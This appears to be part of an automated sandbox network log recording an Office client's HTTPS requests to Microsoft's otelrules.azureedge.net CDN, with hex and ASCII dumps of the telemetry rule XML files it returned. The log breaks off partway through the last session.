                                                                                                                                                                                  2024-11-23 13:47:25 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  62192.168.2.44985613.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:24 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9C710B28"
                                                                                                                                                                                  x-ms-request-id: 7fefabc9-101e-000b-0f11-3d5e5c000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134725Z-178bfbc474b7cbwqhC1NYC8z4n00000004eg000000008qgr
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:25 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 49 69 5d 5b 4e 6e 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 54 74 5d 5b 45 65 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120653" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <SR T="2" R="([Ii][Nn][Nn][Oo][Tt][Ee][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  63192.168.2.44985413.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:24 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 415
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA80D96A1"
                                                                                                                                                                                  x-ms-request-id: 12647bc5-a01e-0070-6743-3d573b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134725Z-178bfbc474btvfdfhC1NYCa2en00000004mg000000009m1e
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:25 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  64192.168.2.44985513.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:24 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 471
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                  ETag: "0x8DC582B97E6FCDD"
                                                                                                                                                                                  x-ms-request-id: 79a9dcb6-201e-003c-1c7b-3b30f9000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134725Z-174c587ffdf89smkhC1TEB697s0000000360000000001ayg
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:25 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  65192.168.2.44985713.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:25 UTC192OUTGET /rules/rule120654v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:25 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:25 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:05 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA54DCC28"
                                                                                                                                                                                  x-ms-request-id: 40c83c0a-001e-00ad-1e79-3b554b000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134725Z-174c587ffdftjz9shC1TEBsh9800000002yg0000000030a9
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:25 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120654" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  66192.168.2.44985813.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:26 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                  x-ms-request-id: 90758f84-b01e-0021-4c46-3ccab7000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134727Z-178bfbc474bpnd5vhC1NYC4vr400000004m0000000005g3z
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  67192.168.2.44986113.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:27 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 472
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                  x-ms-request-id: ba3f3383-a01e-000d-6e55-3cd1ea000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134727Z-15b8b599d885v8r9hC1TEB104g000000030g00000000c7nd
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:27 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  68192.168.2.44986013.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:27 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 419
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                  ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                  x-ms-request-id: 1e280d2f-401e-0029-0d7f-3b9b43000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134727Z-174c587ffdf7t49mhC1TEB4qbg00000002yg000000008gmn
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:27 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  69192.168.2.44985913.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:27 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 477
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                  ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                  x-ms-request-id: 449238ea-501e-0029-7d7c-3bd0b8000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134727Z-174c587ffdfp4vpjhC1TEBybqw00000002y000000000g0ve
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:27 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  70192.168.2.44986213.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:27 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:27 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:27 GMT
                                                                                                                                                                                  Content-Type: text/xml
                                                                                                                                                                                  Content-Length: 468
                                                                                                                                                                                  Connection: close
                                                                                                                                                                                  Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                  Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                  ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                  x-ms-request-id: 6b17e566-f01e-003f-7a44-3cd19d000000
                                                                                                                                                                                  x-ms-version: 2018-03-28
                                                                                                                                                                                  x-azure-ref: 20241123T134727Z-178bfbc474bv587zhC1NYCny5w00000004fg0000000045hr
                                                                                                                                                                                  x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                  X-Cache: TCP_HIT
                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                  2024-11-23 13:47:27 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                  71192.168.2.44986313.107.246.63443
                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                  2024-11-23 13:47:29 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                  User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                  Host: otelrules.azureedge.net
                                                                                                                                                                                  2024-11-23 13:47:29 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                  Date: Sat, 23 Nov 2024 13:47:29 GMT
